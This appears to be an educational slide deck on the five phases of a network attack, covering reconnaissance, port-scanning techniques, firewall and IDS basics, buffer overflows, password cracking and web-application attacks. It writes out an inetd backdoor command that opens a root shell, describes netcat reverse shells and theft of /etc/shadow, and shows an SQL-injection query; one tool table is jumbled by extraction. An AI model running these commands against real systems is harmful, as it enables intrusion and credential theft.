Hacking Fundamentals - Jen Johnson , Miria Grunick

Slide 1: The Fundamentals of Hacking: An 0/3r/!3vv Jen Johnson Miria Grunick

Slide 2: Five Phases of an Attack • Phase 1: Reconnaissance • Phase 2: Scanning • Phase 3: Gaining Access • Phase 4: Maintaining Access • Phase 5: Covering Attacks and Hiding

Slide 3: Phase 1: Reconnaissance • Takes place before the attack. • Investigate the target using publicly available information • Types: Low-Technology Reconnaissance, Searching the Web, Whois Databases, Using the DNS, and General Purpose Tools

Slide 4: Low-Technology Reconnaissance • Social Engineering: An attacker calls the target organization and fools an employee into revealing sensitive information. Often, the attacker calls and pretends to be a new employee, customer, system administrator, or business partner.

Slide 5: Low-Technology Reconnaissance • Physical Break-In: Physically breaking into the building to try to gain access to the network from the inside. This is often accomplished by walking into the building with a group of employees or being hired as an employee or temp.

Slide 6: Low-Technology Reconnaissance • Dumpster Diving: Going through an organization’s discarded documents to find sensitive information. Often, employees will throw out papers that reveal critical information (i.e. – old Post-It® notes with user ID’s and passwords).

Slide 7: Searching the Web • Organization’s Web Site: Can reveal important information, such as the employees’ contact information, clues about the corporate culture and language, business partners, recent mergers and acquisitions, and what technologies the organization uses.

Slide 8: Searching the Web • Search Engines: Can reveal information about the company’s history, current events, future plans, financial status, business partners, technologies in use. • Usenet: Employees may submit questions to technical newsgroups that reveal information about the particular products that the organization uses.

Slide 9: Whois Databases • Whois databases contain information about the assignment of Internet addresses, domain names, registrars, and individual contacts. • First, find out who the registrar is. The Internet Network Information Center (InterNIC) whois database system lists the registrars of websites based on the organization’s name or domain name for sites with the .net, .org or .com extensions. The InterNIC whois database is avaliable online at: www.internic.net/whois.html

Slide 10: Whois Databases • If you are researching an organization without the .com, .net, or .org extensions (i.e. – international websites), try the Allwhois site at: www.allwhois.com/home.html • Once you have the registrar’s name, you can go to the registrar’s site and get more information, such as names and numbers of administrators, email and postal addresses, registration dates, and the addresses of the organization’s DNS servers.

Slide 11: American Registry for Internet Numbers (ARIN) • Contains all IP addresses assigned to a particular organization. Search by company or domain names. • For North American, South American, Caribbean, and sub-Saharan African organizations: www.arin.net/whois/arinwhois.html • For European organizations: www.ripe.net • For Asian organizations: www.apnic.net

Slide 12: Domain Name System (DNS) • DNS – a world-wide hierarchical database that stores information about domain names and IP addresses. This database is searched to get information about a given domain name, most commonly the corresponding IP address. • Once an attacker knows one of the DNS servers, the attacker can begin interrogating the name servers.

Slide 13: DNS • To interrogate DNS servers, first invoke a nslookup program on any UNIX or Windows NT/2000 environment by typing nslookup at the command prompt. • Try to do a zone transfer. In a zone transfer, the nslookup program asks the DNS server to transmit all information it has about a given domain.

Slide 14: DNS • To do a zone transfer, the nslookup must be instructed to use the target’s DNS server, using the server [target_DNS_server] command • Next, specify to search for any type of DNS record by typing set type=any • Initiate the zone transfer by typing ls –d [target_domain] • Output can give useful information, such as system names, IP addresses of the systems, and sometimes even operating system types. • More information about nslookup: www.zoneedit.com/doc/nslookup.html

Slide 15: General Reconnaissance Tools • Sam Spade (freeware avaliable at www.samspade.org/ssw/ ) • Many reconnaissance tools in one: ping, whois, IP block whois, nslookup, dig, DNS zone transfer, traceroute, finger, SMTP VRFY, Web browser. • Other general-purpose reconnaissance tools: CyberKit, NetScan Tools, iNetTools

Slide 16: Web-Based Reconnaissance Tools • Research and Attack portals: sites that allow a user to enter the target site and research or initiate an attack against the target (via denial- of-service attacks or vulnerability scans) • Difference between Web-based tools and general reconnaissance tools: now the traffic comes from the Web server, not the attacker machine. Thus, the attacker can remain more anonymous.

Slide 17: Web-Based Reconnaissance Tools • Examples: www.network-tools.com privacy.net/analyze

Slide 18: Phase 2: Scanning The premise of scanning is to probe as many ports as possible, keeping track of open and useful ports that would be receptive to hacking. Scanners send multiple packets over a communication medium then listen and record each response. The following are techniques for inspecting ports and protocols.

Slide 19: War Dialing • War Dialing: Dialing large pools of telephone numbers in an effort to find unprotected modems. Done with an automated tool, such as THC-Scan 2.0, available at: www.thc.org/releases.php. • This tool will return a list of all of the modems discovered in the range of the phone numbers it was given. • The hacker can then check all of the modems and see if any have no passwords, allowing them access to the network.

Slide 20: FIN Probe • A FIN packet is sent (Or any packet without an ACK or SYN flag) to an open port and one waits for a response. • The correct RFC793 behavior is to not respond. Many broken implementations (i.e MS Windows) send a RESET back.

Slide 21: Network Mapping • A hacker first tries to determine which addresses have active hosts by pinging all possible addresses in the network. • Once a hacker knows which hosts are alive, he or she will try to determine the network topology. This is done by a method called tracerouting.

Slide 22: Network Mapping • Tracerouting: Send a series of packets with different Time-To-Live (TTL) values in the IP header and check the source address of the Time Exceeded message returned. • Example: Send a packet with a TTL of 1. The Time Exceeded message will have the source address of the first router. Now send a packet with a TTL of 2. The Time Exceeded message returned will have the source address of the second router, and so on.

Slide 23: Tracerouting

Slide 24: Network Mapping • Windows 2000/NT and UNIX have tools that do this for us • Windows 2000/NT: tracert • UNIX: traceroute • Another network mapping tool: Cheops (available at: www.marko.net/cheops ) This tool does the ping sweep and traceroute and draws a picture of the topology of the network.

Slide 25: Screenshot of Cheops

Slide 26: How Cheops Works • Sequentially send ARP messages to every IP address in the range. • Traceroute to every IP address that responds to the ARP message.

Slide 27: Scanning Involves 3 Steps • Locating Nodes • Performing Service Discoveries • Testing Services for Known Security Holes

Slide 28: TCP Port Scanning • Most basic form of scanning. Attempts to open a full TCP port connection to determine if that port is active. • This method leaves an easier to spot trail than partial open scanning.

Slide 29: Stealth Port Scanning • All the operating systems now honor the tradition of permitting only the super-user to open the ports numbered 0 to 1023. These standard ports are assigned to services by the IANA (Internet Assigned Numbers Authority, www.iana.org). • Attempts to open a port in the range of 0..1023 by an unprivileged user program will fail. A user program can open any unallocated port higher than 1023.

Slide 30: • On Unix, the text file named /etc/ services (on Windows 2000 the file named %windir% system32 drivers etc services) lists these service names and the ports they use. Here are a few lines extracted from this file:

Slide 31: echo 7/tcp Echo ftp-data 20/udp File Transfer (default) ftp 21/tcp File Transfer (control) ssh 22/tcp SSH Remote Login Protocol telnet 23/tcp Telnet domain 53/udp Domain Name Server www-http 80/tcp WWW HTTP

Slide 32: Non Standard Ports wins 1512/tcp Microsoft Windows Internet Name Service Radius 1812/udp RaDIUS authentication protocol yahoo 5010 Yahoo! Messenger X11 6000-6063/tcp X Window System

Slide 33: Stealth Scanning Includes Some/All of the Following • Setting individual flags (ACK, FIN, RST, .. ) • NULL flags set • All flags set • Bypassing filters, firewalls, routers • Appearing as casual network traffic • Varied packet dispersal rates

Slide 34: Fragmented Packets • The scanner splits the TCP header into several IP fragments. This bypasses some packet filter firewalls because they cannot see a complete TCP header that can match their filter rules.

Slide 35: • Some packet filters and firewalls do queue all IP fragments (e.g., the CONFIG _IP _ALWAYS _DEFRAG option in Linux enables it in the kernel), but many networks cannot afford the performance loss caused by the queuing.

Slide 36: TCP Fragmenting • TCP fragmenting is not a scan method so to speak, although it employs a method to obscure scanning implementations by splitting the TCP header into smaller fragments.

Slide 37: • A minimally allowable fragmented TCP header must contain a destination and source port for the first packet (8 octect, 64 bit), typically the initialized flags in the next, allowing the remote host to reassemble the packet upon arrival.

Slide 38: • The actual reassembly is established through an IPM (internet protocol module) that identifies the fragmented packets by the field equivalent values of: – source – destination – protocol – identification

Slide 39: Using TCP Fragmenting - FragRouter • Program which fragments TCP packets – 35 different ways to fragment • Called a router because it is a software implementation of a router – data from other programs is sent through the FragRouter • FragRouter fragments the packets and then forwards the packets to their destination

Slide 40: SYN Scanning • Also called half-open scanning, as TCP connection is not completed. • A SYN packet is sent and the target host responds with a SYN+ACK, indicating the port is listening • RST indicates a non-listener • The server process is never informed by the TCP layer because the connection did not complete.

Slide 41: A demonstration of this technique is necessary to show a half open transaction: client -> SYN server -> SYN|ACK client -> RST

Slide 42: • This example has shown the target port was open, since the server responded with SYN|ACK flags. • The RST bit is kernel oriented, that is, the client need not send another packet with this bit, since the kernel's TCP/IP stack code automates this.

Slide 43: Inversely, a closed port will respond with RST|ACK. client -> SYN server -> RST|ACK This combination of flags is indicative of a non- listening port.

Slide 44: FIN Scanning • The typical TCP scan attempts to open connections (at least part way). Another technique sends erroneous packets at a port, expecting that open listening ports will send back different error messages than closed ports.

Slide 45: • The scanner sends a FIN packet, which should close a connection that is open. Closed ports reply to a FIN packet with a RST. Open ports, on the other hand, ignore the packet in question. • If no service is listening at the target port, the operating system will generate an error message. • If a service is listening, the operating system will silently drop the incoming packet. Therefore, silence indicates the presence of a service at the port.

Slide 46: This is the negotiation for open/closed port recognition client -> FIN server -> - No reply signaled by the server is iconic of an open port. The server's operating system silently dropped the incoming FIN packet to the service running on that port.

Slide 47: RST Reply • Opposing this is the RST reply by the server upon a closed port reached. • Since, no service is bound on that port, issuing a FIN invokes a reset (RST) response from the server. client -> FIN server -> RST

Slide 48: • Other techniques that have been used consist of XMAS scans where all flags in the TCP packet are set, or NULL scans where none of the bits are set. However, different operating systems respond differently to these scans, and it becomes important to identify the OS and even its version and patch level.

Slide 49: Reverse Ident Scanning • This technique involves issuing a response to the ident/auth daemon, usually port 113 to query the service for the owner of the running process. • The main reason behind this is to find daemons running as root, this result would entice an intruder to find a vulnerable overflow and instigate other suspicious activities involving this port.

Slide 50: • Alternatively, a daemon running as user nobody (httpd) may not be as attractive to a user because of limited access privileges. • identd could release miscellaneous private information such as: – user info – entities – objects – processes

Slide 51: FTP Bounce

Slide 52: Background • FTP session consists of two connections between the client and the server. • The high port server connection is enabled by the client that allows the FTP server to send data to the client. • When the client wants to transfer data to or from the server, it issues a PORT command. The PORT command instructs the server to open a data connection which is used to transfer the data.

Slide 53: Problem • An outside attacker can use the FTP server to open connections which appear to originate from the server. This could be used to bypass the access control restrictions.

Slide 55: How To Use FTP Bounce Attacks

Slide 56: Port Scanning • An attacker can run the attck from a third-party FTP server acting as a stage for the scan. The victim site sees the scan as coming from the FTP server rather than the true source (the FTP client). • When the victim site is on the same subnet as the FTP server, or when it does not filter traffic from the FTP server, the attacker can use the server machine as the source of the port scan rather than the client machine

Slide 57: Bypassing Basic Packet Filtering Devices • An attacker may bypass a firewall in certain network configurations. – Example; a site has its anonymous FTP server behind a firewall. Using the technique above, an attacker determines that an internal web server at that site is available on port 8080, a port normally blocked by a firewall.

Slide 58: • By connecting to the public FTP server at the site, the attacker initiates a further connection between the FTP server and an arbitrary port on a non-public machine at that site . • (for instance the internal web server at port 8080). • As a result, the attacker establishes a connection to a machine that would otherwise be protected by the firewall.

Slide 59: Bypassing Dynamic Packet Filtering Devices • Example – victim site houses all of its systems behind a firewall that uses dynamic packet filters – person at victim site browses web pages and downloads a Java applet constructed by attacker. – Java applet then opens an outbound FTP connection to attacker's machine. – applet then issues an FTP PORT command, instructing server machine to open a connection to some otherwise protected system behind the victim firewall.

Slide 60: • Dynamic packet filtering firewall examines outbound packets to determine if any action is required on its part. • It notes the PORT command and allows an incoming connection from the remote web server to the telnet port on the victim machine. • This connection was allowed in this case because the PORT command was issued by the client.

Slide 61: Scanning Packages Available Commercially • CyberCop • JAKAL • NetRecon • NMap

Slide 62: CyberCop • Intrusion detection system that safeguards corporate assets by performing real-time surveillance of network traffic. The CyberCop system protects networks from external and internal attacks by providing a "high tech burglar alarm" capable of alerting companies when the security of their networks is breached by unauthorized intruders.

Slide 63: JAKAL • Developed on UNIX to test UNIX hosts. Jakal is interesting because of its possibilities: it is designed for stealth and to go through most firewalls. Usually it doesn't leave any trace of its activity, except for some messages (SYN|ACK).

Slide 64: NetRecon • Scans multiple operating systems, including UNIX, Linux, Windows 2000, Windows NT, Windows 95/98 and NetWare. • Scans using many Windows NT/2000 network protocols such as TCP/IP, IPX/SPX, and NetBEUI.

Slide 65: Nmap • Most popular scanner to date • Free utility for network exploration or security auditing. Designed to rapidly scan large networks. Uses raw IP packets to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use. • http://www.insecure.org/nmap/idlescan.html

Slide 66: Scan Types Supported by Nmap

Slide 67: Type of Scan Command-Line Summary of Option Characteristics TCP Connect -sT Completes the 3- way handshake with each scanned port. TCP SYN -sS Only sends the initial SYN and awaits the SYN-ACK response. TCP FIN -sF Sends a TCP FIN to each port. Reset indicates port is closed.

Slide 68: TCP Xmas Tree -sX Sends packet with the FIN, URG and PUSH code bits set. Reset indicates port is closed. Null -sN Sends packets with no code bits set. Reset indicates port is closed. TCP ACK -sA Sends packet with the ACK code bit set to each target port. Window -sW Similar to ACK, but focuses on TCP Window size to determine if ports are

Slide 69: FTP Bounce -b Bounces a TCP scan off of an FTP server, obscuring the originator of the scan. UDP Scanning -sU Sends a UDP packet to target ports to determine if a UDP service is listening. Ping -sP Sends ICMP echo request packets to every machine on target network. RPC Scanning -sR Scans RPC services using all discovered to open TCP/UDP ports on the target to send RPC Null commands.

Slide 70: Determining Firewall Filter Rules • One disadvantage of Nmap – it cannot differentiate what is open on an end machine and what is being firewalled. • It is also important to determine what ports are available through the firewall or router. One tool that can do this is Firewalk (avaliable: www.packetfactory.net/projects/firewalk/firewalk-5.0.tgz • Firewalk can determine which types of packets are permitted through and which ports are accessible through the firewall. • Note: Firewalk is only useful for packet-filtering devices, not proxy-based firewalls.

Slide 71: How Firewalk Works • Determines the number of hops between the tool and the firewall • Sends UDP and TCP packets with TTL one greater than the hop count to the filtering device. – If ICMP Time Exceeded message is returned, the port is available through the firewall – If ICMP Port Unreachable message or nothing is returned, the port is most likely being filtered by the firewall. • Unlike Nmap, Firewalk can determine what kind of packets are allowed through the firewall for each specific port and which ports allow new connections.

Slide 72: Vulnerability Scanning • Use an automated tool that checks for common configuation errors, default configuration errors, and well-known system vulnerabilities. • Generally made up of multiple parts: vulnerability database, user configuration tool, scanning engine, knowledge base of current active scan, and results repository and report generation tool.

Slide 73: Vulnerability Scanner

Slide 74: Nessus • The most popular of the vulnerability scanners. (Available: www.nessus.com) • Also allows the user to write their own vulernability checks and include them in the tool. • Has a variety of plug-ins, such as checking for vulnerabilities that allow a shell to be gained remotely and checking to see if the target system already has backdoor tools installed.

Slide 75: Port, Socket & Service Vulnerability Penetrations Once a breach has been uncovered during the discovery phase, different vulnerability penetrations are used to take advantage and possibly gain control of computers, servers and internetworking equipment. More on exploiting these vulnerabilities in Phase 3……

Slide 76: Operating System Fingerprinting with Nmap

Slide 77: TCP ISN Sampling • The idea here is to find patterns in the initial sequence numbers chosen by TCP implementations when responding to a connection request. • Categorized into groups such as traditional 64K, random increments and true random, (Linux 2.0)

Slide 78: Don’t Fragment Bit • Trend of operating systems to set the IP “Don’t Fragment” bit on some of the packets they send. • By paying attention to this bit, one can glean information on the target OS.

Slide 79: TCP Initial Window • Simply involves checking the window size on returned packets. • Gives quite a lot of information since some operating systems can be uniquely identified by the window alone.

Slide 80: TCP Option • Excellent means of gaining access to leaked information. • Can discover if a host is implementing them by sending a query with an option set: target shows support of the option by setting it on the reply. • Can stuff many options on one packet to test everything at once.

Slide 81: SYN Flood Resistance • If too many forged SYN packets are sent to some operating systems, they will stop accepting new connections. • Many operating systems can only handle 8 packets. • By sending 8 forged packets to an open port and then trying to establish a connection, you can learn about the operating system used. • This is easier to detect on the target side than other methods, however.

Slide 82: Name Whois database Gives the registrar’s name when given a company’s name or domain name IP Address Gives all IP addresses Lookup assigned to an organization or domain name DNS Lookup Gives DNS information about a corresponding IP address Sam Spade Ping, Whois, IP block lookup, DNS lookup, dig, zone transfer, traceroute, verify, web browser Web-Based Tools Traceroute, lookup, ping, dns lookup, DNS records, email THC-Scan 2.0 War dialer Cheops Pingsweep, traceroute, draws a visual representation of the network Traceroute Determine network topology Nmap Port scanner and network mapper Firewalk Able to determine if ports are available through a firewall or router Nessus Vulnerability Scanner Stack Based Using stack overflow to Buffer Overflow get a target machine to Attack execute code Pwdump Extracts hashed Purpose Platform Where to get it Comments (For .com, .net, .org) Web-based database www.internic.net/whois.html (For other domains) www.allwhois.com/home.html (North and South America, Web-based database Caribbean, sub-Saharan African) www.arin.net/whois/arinwhois.html (Europe) www.ripe.net (Asia) www.apnic.net Built into Windows and Linux More information: (nslookup) www.zoneedit.com/doc/ nslookup.html Windows www.samspade.org/ssw/ Note that all of the operations can be traced back to the system running the program finger, STMP www.network-tools.com/ Web based, so it can’t be traced back to you privacy.net/analyze validation Windows www.thc.org/releases.php Lots of other useful tools on this site Linux www.marko.net/cheops First need to download glib10-1.0.6-6.i386.rpm and gtk+10-1.0.6-6.i386.rpm (available at rpmfind.net/linux/RPM/redhat/6.2 /i386 Windows Built into Windows and Linux Windows command: tracert [IP addr.] Linux Linux Command: traceroute [IP addr.] Windows www.insecure.org/nmap/ Linux idlescan.html Linux www.packetfactory.net/projects Only for packet-filtering firewalls. Need to /firewalk/firewalk-5.0.tgz download the 3 libraries, libnet and libpcap from the site, and libdnet (for Fedora 2 from rpmfind.net /linux/rpm2html/ search.php?query=libdnet) Windows www.nessus.com Can test multiple hosts at the same time, Allows the Linux user to write plug-ins Windows packetstormsecurity.org/docs/hack/ Text document explaining the process Linux Smashstack.txt Windows packetstormsecurity.org/Crackers/N

Slide 83: Random Clipart

Slide 84: Pre-Phase 3 Understanding Filters, Firewalls and the IDS

Slide 85: Packet Filter • First line of defense. • Checks each packet against a policy or rule before routing it to the destined node or network destination. • Most reject SYN/ACK, ICMP, and incoming UDP packets that initiate inward security.

Slide 86: Example • Cisco Series Access Router • If router is configured to pass a particular protocol, external hosts can use that protocol to establish a direct connection to internal hosts. • The router will produce an audit log with features to generate alarms when hostile behavior is detected.

Slide 87: Enhanced Version Stateful Filter

Slide 88: Stateful Filter • Provides same functionality as previous version, but also keeps track of state information, such as TCP sequence numbers. • Uses the analysis of data within the lowest levels of the protocol stack to compare the current session to previous ones for the purpose of detecting suspicious activity. • Uses specific rules determined by the user.

Slide 89: Downside • Does not recognize specific applications, therefore, is unable to apply dissimilar rules to different applications.

Slide 90: Proxy Firewall

Slide 91: • Simple server with duel NICs that has routing or packet forwarding deactivated, utilizing a proxy server daemon instead. • Gateway is a term used as a synonym for proxy server. • Gathers all internet requests, forwards them to internet servers, receives responses and forwards them to the original requestor within the company.

Slide 92: Enhanced Version Application Proxy Gateway

Slide 93: Application Proxy Gateway • Contains integrated modules that check every request and response. • Example: – An FTP stream may only be allowed to download data.

Slide 94: Application Gateways look at data on the application layer of the protocol stack and serve as proxies for outside users. Thus, outside users never really have a direct connection to anything beyond the proxy gateway.

Slide 95: Implementing a Backdoor Method 4 Actions Take Place • Seizing a virtual connection; this involves hijacking a remote telnet session, a VPN tunnel or a secure-ID session. • Planting an insider; User, engineer or socially engineered (swindled) person. – Can also spoof an employee with an e mail with a remote access Trojan attached.

Slide 96: • Manipulating an internal vulnerability; attacks on demilitarized zones, such as E-mail, domain name resolution, telnet or FTP. • Manipulating an external vulnerability; involves penetrating through external mail server, HTTP server daemon and/or telnet service on an external boundary gateway.

Slide 97: Intrusion Detection System

Slide 98: Scanning Intrusion Detection Systems • Detects statistical anomalies. Measures a "baseline" of such stats as CPU utilization, disk activity, user logins, file activity, and so forth. Then, the system can trigger when there is a deviation from this baseline. • Can detect the anomalies without having to understand the underlying cause behind them.

Slide 99: Signature Recognition • The majority of commercial products are based upon examining the traffic looking for well- known patterns of attack. • Classic example is to example every packet on the wire for the pattern "/cgi-bin/phf?", which might indicate somebody attempting to access this vulnerable CGI script on a web-server.

Slide 100: How does a NIDS match signatures with incoming traffic? • 1. Protocol stack verification A number of intrusions, such as "Ping-O-Death" and "TCP Stealth Scanning" use violations of the underlying IP, TCP, UDP, and ICMP protocols in order to attack the machine. A simple verification system can flag invalid packets. This can include valid, by suspicious, behavior such as severally fragmented IP packets.

Slide 101: • 2. Application protocol verification A number of intrusions use invalid protocol behavior, such as "WinNuke", which uses invalid NetBIOS protocol or DNS cache poisoning, which has a valid, but unusually signature. In order to effectively detect these intrusions, a NIDS must re- implement a wide variety of application- layer protocols in order to detect suspicious or invalid behavior.

Slide 102: 3. Creating new loggable events A NIDS can be used to extend the auditing capabilities of your network management software. For example, a NIDS can simply log all the application layer protocols used on a machine. Downstream event log systems (WinNT Event, UNIX syslog, SNMP TRAPS, etc.) can then correlate these extended events with other events on the network.

Slide 103: Other countermeasures besides IDS • Firewalls: These are to protect from external attacks; most intrusions are committed by employees inside the firewall, and it should therefore be considered a last line of defense.

Slide 104: Authentication • Scanners should be run that automate the finding of open accounts. • One should enforce automatically strict policies for passwords (7 character minimum, including numbers, dual-case, and punctuation) using crack or built in policy checkers (WinNT native, add-on for UNIX).

Slide 105: Virtual Private Networks • Create secure connections over the Internet for remote access. • VPN’s actually decrease corporate security. While the pipe itself is secure (authenticated, encrypted), either end of the pipe are wide open. • A home machine compromised with a backdoor rootkit allows a hacker to subvert the VPN connection, allow full, undetectable access to the other side of the firewall.

Slide 106: IDS Setup Locations

Slide 107: • Network Hosts: Although network intrusion detection systems have traditionally been used as probes, they can also be placed on hosts. • Network perimeter: IDS is most effective on the network perimeter, such as on both sides of the firewall, near the dial-up server, and on links to partner networks. These links tend to be low-bandwidth (T1 speeds) such that an IDS can keep up with the traffic.

Slide 108: • Servers are often placed on their own network, connected to switches. The problem these servers have, though, is that IDS systems cannot keep up with high-volume traffic. • Server Farms: For extremely important servers, you may be able to install dedicated IDS systems that monitor just the individual server's link. Also, application servers tend to have lower traffic than file servers, so they are better targets for IDS systems.

Slide 109: Phase 3 Penetration

Slide 110: Stack Based Overflow Attack • Overwrite the return pointer stored in the stack by overflowing the stack. When the return pointer is copied into the IP, the IP tries to fetch the data of the new address that was pushed into the return pointer by overflowing the stack. • Example: Overflow the stack with a series of ‘A’ ‘s. When the value of the return pointer is copied into the IP, the IP address will fetch the instruction from the all ‘A’ address (address 41414141h)

Slide 111: • Important to overflow buffer with meaningful information – i.e. – machine language code containing commands we want executed • Difficult to overwrite return pointer to hit exactly at beginning of code – Place a bunch of NOP or NOP equivalents (called a NOP sled) at beginning of code. – When overwriting return pointer, have to aim to overwrite to a range of values rather than a specific value.

Slide 112: • Once the stack is smashed, there are many things an attacker can do. Most likely, the attacker will try to create a back door to the target system. • Creating a backdoor with Inetd: Add a line to the /etc/inetd.conf file, which will spawn a command shell each time anyone tries to connect to a port defined by the attacker. Run this line in the stack to get a command shell to open on a given port: /bin/sh –c “echo [port #] stream tcp nopwait root /bin/sh sh –I” >> /etc/inetd.conf; killall –HUP inetd

Slide 113: • Creating a backdoor with TFTP and Netcat: Get the target to execute the TFTP client. Load the Netcat program onto the target system. Configure Netcat to push a command shell from the target machine to the attacker’s machine. • A good document on Stack Based Buffer Overflow Attacks: “Smashing the Stack for Fun and Profit” by Aleph One, available at: packetstormsecurity.org/docs/hack/ smashstack.txt

Slide 114: Password Attacks • Two kinds: Password Guessing and Password Cracking • Password Guessing: Attempt to guess the password for a particular user ID. This process is rarely successful, time consuming, and generates a lot of network traffic. Also, some accounts are locked out after a set number of unsuccessful guesses. Many password-guessing tools can be found at Packet Storm’s Site: packetstormsecurity.org

Slide 115: • Password Cracking: Steal the file with the encrypted passwords and use a password cracking program to recover the original passwords. • Stealing the file: Win – use a Pwdump program ( packetstormsecurity.nl/Crackers/NT/), or sniff them from the network (more on sniffing later) UNIX – gain root-level access and steal the /etc/shadow or /etc/secure file if shadow passwords are used, otherwise steal the /etc/passwd file.

Slide 116: • Password Cracking Software: • Windows: L0phtCrack (available: www.atstake.com/products/lc/ ) This tool includes other options, such as a sniffer and a pwdump program • UNIX: John the Ripper (available: www. openwall.com/john/ )

Slide 117: Web Application Attacks • Can still be conducted, even if the target site uses SSL. • Account Harvesting, Undermining Session- Tracking Mechanisms, SQL Piggybacking • Account Harvesting: Works for applications that have different error messages for an incorrect user ID and an incorrect password. By looking at the error messages, the attacker can determine valid user ID’s, sometimes even passwords.

Slide 118: • Here, although the web pages look identical for each type of error, notice that the URL has changed, giving any hackers a hint about incorrect user ID’s vs. incorrect passwords.

Slide 119: Undermining Web Application Session Tracking • Three ways Session ID’s are implemented: URL session tracking, hidden form elements, and cookies. • The attacker will first login to the site multiple times to see how the session ID’s are generated. • To change a session ID in a URL, simply type a different user’s session ID (or a generated one) over the original user’s ID in the URL.

Slide 120: • To change the session ID in a site with hidden form elements, view the source of the page, modify the ID number and reload it into the browser. • To edit the session ID in a site that uses cookies, use a program called Achilles (available: www.mavensecurity.com/achilles). Achilles is a web proxy that intercepts the per- session cookies and allows the attacker to modify them.

Slide 121: SQL Piggybacking • Extending an application’s SQL statement to extract or update information that the attacker is not authorized to access. • Rainforest Puppy has a paper about SQL Piggybacking: “How I Hacked Packetstorm” (available: www.opennet.ru/base/cgi/22.txt.html ) • Begin by exploring how the Web application interacts with the database.

Slide 122: • The attacker may extend the SQL query – Example • Use SELECT * FROM account WHERE (userid=‘10001’ and number = ‘11111111111’ or userid=‘10002’) • instead of SELECT * FROM account

Slideshare.net (beta)